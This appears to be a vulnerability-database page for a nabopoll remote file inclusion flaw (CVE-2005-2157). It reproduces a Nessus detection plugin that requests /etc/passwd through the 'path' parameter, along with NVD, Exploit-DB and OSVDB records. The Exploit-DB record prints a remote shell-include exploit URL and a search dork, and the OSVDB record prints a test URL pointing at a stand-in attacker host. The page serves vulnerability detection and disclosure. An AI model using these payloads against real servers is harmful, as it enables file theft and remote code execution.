ID NABOPOLL_PATH_REMOTE_INCLUDES.NASL Type nessus Reporter This script is Copyright (C) 2005-2018 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2021-01-02T00:00:00
Description
The remote host is running nabopoll, a web-based voting / survey
software for PHP and MySQL.
The installed version of nabopoll allows remote attackers to control
the 'path' parameter used when including PHP code in the script
'survey.inc.php'. By leveraging this flaw, an attacker is able to
view arbitrary files on the remote host and even execute arbitrary PHP
code, possibly taken from third-party hosts.
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
if (description) {
# Plugin registration: identifiers and metadata consumed by the Nessus
# engine. Nothing in this block runs during a scan; the check itself
# starts after the closing brace.
script_id(18618);
script_version("1.17");
# Public references for the flaw this plugin detects.
script_cve_id("CVE-2005-2157");
script_bugtraq_id(14134);
script_name(english:"Nabopoll survey.inc.php path Parameter Remote File Inclusion");
script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that is prone to a
remote file include attack." );
script_set_attribute(attribute:"description", value:
"The remote host is running nabopoll, a web-based voting / survey
software for PHP and MySQL.
The installed version of nabopoll allows remote attackers to control
the 'path' parameter used when including PHP code in the script
'survey.inc.php'. By leveraging this flaw, an attacker is able to
view arbitrary files on the remote host and even execute arbitrary PHP
code, possibly taken from third-party hosts." );
script_set_attribute(attribute:"see_also", value:"http://securitytracker.com/alerts/2005/Jul/1014355.html" );
# The advice is configuration hardening rather than a vendor fix: the
# OSVDB entry reproduced later on this page lists no upgrade or patch.
script_set_attribute(attribute:"solution", value:
"Ensure that PHP's 'register_globals' and 'allow_url_fopen' are
disabled." );
# Tenable's own scoring. NOTE(review): the NVD CVSS2 vector for
# CVE-2005-2157 reproduced later on this page is
# AV:N/AC:L/Au:N/C:N/I:P/A:N (5.0), so the two assessments differ on
# access complexity and on confidentiality/availability impact.
script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:H/RL:W/RC:ND");
script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"plugin_publication_date", value: "2005/07/05");
script_set_attribute(attribute:"vuln_publication_date", value: "2005/07/01");
script_cvs_date("Date: 2018/06/13 18:56:28");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();
script_summary(english:"Checks for path parameter remote file include vulnerability in Nabopoll");
# ACT_ATTACK: the check below sends a crafted request to the target
# rather than relying on banner or version information.
script_category(ACT_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2005-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");
# Prerequisite plugin and knowledge-base keys gating this check:
# the web server must be fingerprinted first, CGI scanning must not be
# disabled, and the www/PHP key must be present.
script_dependencies("http_version.nasl");
script_exclude_keys("Settings/disable_cgi_scanning");
script_require_ports("Services/www", 80);
script_require_keys("www/PHP");
exit(0);
}
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
port = get_http_port(default:80);
if (!can_host_php(port:port)) exit(0);

# Response patterns that show the 'path' parameter reached include():
# either the contents of /etc/passwd came back, or PHP reported that it
# failed to open that file. The warning forms are kept because they still
# prove the parameter controls the include path even when magic_quotes_gpc
# prevented the null-byte truncation from working.
patterns = make_list(
  "root:.*:0:[01]:",
  "Warning: main\(/etc/passwd.+failed to open stream",
  "Warning: Failed opening '/etc/passwd.+for inclusion"
);

# Probe every known CGI directory; report on the first vulnerable instance.
foreach dir (cgi_dirs()) {
  url = string(dir, "/survey.inc.php?", "path=/etc/passwd%00");
  w = http_send_recv3(method:"GET", item:url, port:port);
  if (isnull(w)) exit(1, "The web server on port "+port+" did not answer");
  res = w[2];

  # Any single pattern match is enough; egrep has no side effects, so
  # checking them in a loop is equivalent to the short-circuit chain.
  vulnerable = FALSE;
  foreach pattern (patterns) {
    if (egrep(string:res, pattern:pattern)) {
      vulnerable = TRUE;
      break;
    }
  }

  if (vulnerable) {
    security_warning(port);
    exit(0);
  }
}
{"id": "NABOPOLL_PATH_REMOTE_INCLUDES.NASL", "bulletinFamily": "scanner", "title": "Nabopoll survey.inc.php path Parameter Remote File Inclusion", "description": "The remote host is running nabopoll, a web-based voting / survey\nsoftware for PHP and MySQL. \n\nThe installed version of nabopoll allows remote attackers to control\nthe 'path' parameter used when including PHP code in the script\n'survey.inc.php'. By leveraging this flaw, an attacker is able to\nview arbitrary files on the remote host and even execute arbitrary PHP\ncode, possibly taken from third-party hosts.", "published": "2005-07-05T00:00:00", "modified": "2021-01-02T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/18618", "reporter": "This script is Copyright (C) 2005-2018 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://securitytracker.com/alerts/2005/Jul/1014355.html"], "cvelist": ["CVE-2005-2157"], "type": "nessus", "lastseen": "2021-01-01T03:54:49", "edition": 24, "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-2157"]}, {"type": "osvdb", "idList": ["OSVDB:17706"]}, {"type": "exploitdb", "idList": ["EDB-ID:3315"]}], "modified": "2021-01-01T03:54:49", "rev": 2}, "score": {"value": 6.7, "vector": "NONE", "modified": "2021-01-01T03:54:49", "rev": 2}, "vulnersScore": 6.7}, "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description) {\n script_id(18618);\n script_version(\"1.17\");\n\n script_cve_id(\"CVE-2005-2157\");\n script_bugtraq_id(14134);\n\n script_name(english:\"Nabopoll survey.inc.php path Parameter Remote File Inclusion\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is prone to a\nremote file include attack.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running nabopoll, a 
web-based voting / survey\nsoftware for PHP and MySQL. \n\nThe installed version of nabopoll allows remote attackers to control\nthe 'path' parameter used when including PHP code in the script\n'survey.inc.php'. By leveraging this flaw, an attacker is able to\nview arbitrary files on the remote host and even execute arbitrary PHP\ncode, possibly taken from third-party hosts.\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://securitytracker.com/alerts/2005/Jul/1014355.html\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Ensure that PHP's 'register_globals' and 'allow_url_fopen' are\ndisabled.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:W/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/07/05\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/07/01\");\n script_cvs_date(\"Date: 2018/06/13 18:56:28\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_end_attributes();\n\n script_summary(english:\"Checks for path parameter remote file include vulnerability in Nabopoll\");\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n script_copyright(english:\"This script is Copyright (C) 2005-2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_dependencies(\"http_version.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/PHP\");\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n\nport = get_http_port(default:80);\nif (!can_host_php(port:port)) exit(0);\n\n\n# Loop through CGI directories.\nforeach dir (cgi_dirs()) {\n # Try to exploit one of the flaws to read /etc/passwd.\n w = http_send_recv3(method:\"GET\",\n item:string(\n dir, \"/survey.inc.php?\",\n \"path=/etc/passwd%00\"\n ), \n port:port\n );\n if (isnull(w)) exit(1, \"The web server on port \"+port+\" did not answer\");\n res = w[2];\n\n # There's a problem if...\n if (\n # there's an entry for root or...\n egrep(string:res, pattern:\"root:.*:0:[01]:\") ||\n # we get an error saying \"failed to open stream\" or \"failed opening\".\n #\n # nb: this suggests magic_quotes_gpc was enabled but passing \n # remote URLs might still work.\n egrep(string:res, pattern:\"Warning: main\\(/etc/passwd.+failed to open stream\") ||\n egrep(string:res, pattern:\"Warning: Failed opening '/etc/passwd.+for inclusion\")\n ) {\n security_warning(port);\n exit(0);\n }\n}\n", "naslFamily": "CGI abuses", "pluginID": "18618", "cpe": [], "scheme": null}
{"cve": [{"lastseen": "2020-10-03T11:34:55", "description": "PHP remote file inclusion vulnerability in survey.inc.php for nabopoll 1.2 allows remote attackers to execute arbitrary PHP code via the path parameter.", "edition": 3, "cvss3": {}, "published": "2005-07-06T04:00:00", "title": "CVE-2005-2157", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-2157"], "modified": "2011-03-08T02:23:00", "cpe": ["cpe:/a:nabocorp:nabopoll:1.2"], "id": "CVE-2005-2157", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2157", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:nabocorp:nabopoll:1.2:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-01-31T18:11:48", "description": "nabopoll 1.2 (survey.inc.php path) Remote File Include Vulnerability. CVE-2005-2157. 
Webapps exploit for php platform", "published": "2007-02-15T00:00:00", "type": "exploitdb", "title": "nabopoll 1.2 survey.inc.php path Remote File Include Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-2157"], "modified": "2007-02-15T00:00:00", "id": "EDB-ID:3315", "href": "https://www.exploit-db.com/exploits/3315/", "sourceData": "By Cr@zy_King\n\ncrazy_king@eno7.org\n\nThakns : ApAci & Erne & Uyussman & Eno7 & Thehacker & Crackers_Child & Liz0zim\n\nScript : nabopoll 1.x\n\nRisk : Remote File .nclude | High\n\nSite : http://nabocorp.com/\n\nGoogle Dork : inurl:\"nabopoll/\"\n\nExploit :\ninclude_once($path.\"includes/tags.inc.php\");\ninclude_once($path.\"config.inc.php\");\n\nFiles: survey.inc.php\n\nExploit : http://www.site.com/[path]/survey.inc.php?path=http://sheel.txt?\n\nAyyildiz.Org Present\n\n# milw0rm.com [2007-02-15]\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/3315/"}], "osvdb": [{"lastseen": "2017-04-28T13:20:14", "bulletinFamily": "software", "cvelist": ["CVE-2005-2157"], "edition": 1, "description": "## Vulnerability Description\nNabopoll contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to survey.inc.php not properly sanitizing user input supplied to the path variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nNabopoll contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to survey.inc.php not properly sanitizing user input supplied to the path variable. 
This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[victim]/nabopoll/survey.inc.php?path=3Dhttp://[attacker]/test/xpl.php?cmd=3Did\n## References:\nVendor URL: http://www.nabocorp.com/nabopoll/\nSecurity Tracker: 1014355\n[Secunia Advisory ID:15910](https://secuniaresearch.flexerasoftware.com/advisories/15910/)\n[CVE-2005-2157](https://vulners.com/cve/CVE-2005-2157)\n", "modified": "2005-07-01T10:16:31", "published": "2005-07-01T10:16:31", "href": "https://vulners.com/osvdb/OSVDB:17706", "id": "OSVDB:17706", "title": "Nabopoll survey.inc.php path Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}]}